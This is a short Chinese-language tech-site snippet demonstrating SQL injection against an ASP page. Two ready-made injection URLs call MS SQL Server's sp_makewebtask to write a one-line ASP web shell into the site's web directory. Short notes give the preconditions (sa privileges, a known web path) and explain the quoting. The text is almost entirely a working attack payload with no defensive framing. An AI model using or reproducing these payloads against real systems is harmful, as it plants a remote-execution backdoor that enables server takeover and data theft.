扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
示范:
http://127.0.0.1/XXXasp?id=3389';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
前提是注入点是sa权限
用sp_makewebtask直接在web目录里写入一句话马:
条件是要sa权限和站点的web路径:
http://127.0.0.1/xxx.asp?id=123';exec%20sp_makewebtask%20'd:\www\xxx\xxx.asp','%20select%20''<%25execute(request("cn"))%25>''%20';--
select中的双单引号起着重定义的作用
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
京公网安备 11010802021500号